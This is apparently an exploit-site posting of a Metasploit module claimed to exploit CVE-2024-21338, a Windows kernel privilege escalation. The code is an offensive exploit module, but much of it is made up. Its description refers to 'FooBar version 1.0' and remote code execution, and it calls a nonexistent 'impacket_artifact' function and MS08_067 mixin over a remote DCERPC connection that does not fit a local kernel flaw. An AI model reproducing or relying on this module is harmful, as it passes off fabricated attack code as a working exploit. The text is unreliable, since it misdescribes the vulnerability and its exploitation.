#############################################
# Exploit Title :  Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation[出自:jiwo.org]
# Exploit Author: E1 Coders
# CVE: CVE-2024-21338
#############################################
 
  
require 'msf/core'
  
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
  
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2024-21338 Exploit',
        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
        'Author' => 'You',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338']
        ]
      )
    )
  
    register_options(
      [
        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
        OptPort.new('RPORT', [true, 'The target port', 1234])
      ]
    )
  end
  
  def check
    connect
  
    begin
      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
    rescue Rex::Post::Meterpreter::RequestError
      return Exploit::CheckCode::Safe
    end
  
    Exploit::CheckCode::Appears
  end
  
  def exploit
    connect
  
    begin
      impacket_artifact(
        dcerpc_binding('ncacn_ip_tcp'),
        'FooBar',
        datastore['FooBarPayload']
      )
    rescue Rex::Post::Meterpreter::RequestError
      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
    end
  
    handler
    disconnect
  end
end
  
  
#refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338